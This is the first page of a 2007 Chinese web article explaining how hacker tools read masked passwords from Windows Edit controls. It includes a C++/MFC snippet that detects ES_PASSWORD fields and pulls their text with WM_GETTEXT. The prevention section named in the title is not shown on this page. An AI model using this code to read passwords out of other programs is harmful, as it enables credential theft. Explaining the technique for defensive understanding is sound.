黑客非法探取密码的原理及防范

来源： 编辑：guang123wei$%^ 更新日期：2007-8-22 11:37:09 浏览：701 次

　　一、非法获取Password的原理： 　　Edit控件是Windows的一个标准控件，当把其Password属性设为True时,就会将输入的内容屏蔽为星号，从而达到保护的目的。虽然我们看来都是星号，但程序中的Edit控件实际仍是用户输入的密码，应用程序可以获取该控件中的密码，其他应用程序也可以通过向其发送WM_GETTEXT或EM_GETLINE消息来获取Edit控件中的内容。黑客程序正是利用Edit控件的这
个特性，当发现当前探测的窗口是Edit控件并且具有ES_PASSWORD属性时，则通过SendMessage向此窗口发送WM_GETTEXT或EM_GETLINE消息，这样Edit框中的内容就一目了然了。 　　二、黑客软件工作方法 　　首先要取得当前的窗口，并判断是否是Edit控件，一般多通过鼠标来指定要探测的窗口，例如在WM_MOUSEMOVE消息的响应函数中进行判断，现列举代码片段如下： //将客户坐标转换成屏幕坐标
ClientToScreen(&point);
//返回一个包含指定屏幕坐标点的窗口
CWnd* pWnd = CWnd::WindowFromPoint(point);
if (pWnd)
{
//获取窗口句柄
HWND hwndCurr = pWnd->GetSafeHwnd();
if ((::GetWindowThreadProcessId (GetSafeHwnd(), NULL)) !=
(::GetWindowThreadProcessId (hwndCurr, NULL)))
{
char lpClassName[255];
//获取类名
if (::GetClassName(hwndCurr, lpClassName, 255))
{
//判断是否是Edit控件
if (0 == m_strWndClass.CompareNoCase("EDIT"))
{
//获取窗口风格
LONG lStyle = ::GetWindowLong(hwndCurr, GWL_STYLE);
//如果设置了ES_PASSWORD属性
if (lStyle & ES_PASSWORD)
{
char szText[255];
//通过掌握的句柄hwndCurr向此控件发送WM_GETTEXT消息
::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText);
//密码已保存在szText中
m_strPassword = szText;
}
}
}
}

　第1页/总3页　 第一页 上一页 下一页　最后一页     【发表评论】

昵   称：	(不填写则显示为匿名)
标   题：
内   容：	字数上限为1000字
免责声明：网友对此资源信息的评论仅代表个人观点，中国人才库有权删除违乱评论信息！

最新资源

·韩舞蹈网游公开Super Ju ·融入东西文化 新作《君主 ·谷歌投资太多或变身共同 ·MySpace推应用小工具 电 ·监测数据称每天约有500万

资源推荐

·SNS网站两极分化严重：10家 ·土豆优酷双双遭难 视频第二 ·龙芯首个实体店开业在即 不 ·欧美科幻大作《星际迷航OL ·细数09年值得期待的两款韩

资源排行

·100个最古老互联网域名 最 ·湖北设立创投引导基金 首期 ·手机里的情书陪我们度过最 ·雨林木风重金购买域名115. ·来生要为你变成另一蝴蝶

名站导航

◆ 音乐MP3 ◆ 聊天网址 ◆ 游戏网址 ◆ 幽默笑话 ◆ 各地大学 ◆ 考试培训 ◆ 论文考研 ◆ 旅游网址 ◆ 法律法规 ◆ 网页制作 ◆ 英语学习 ◆ 政府组织 ◆ 新闻报刊 ◆ 人才招聘 ◆ 营养美食 ◆ 娱乐明星 ◆ 文学小说 ◆ 军事资讯 ◆ 软件下载 ◆ 艺术欣赏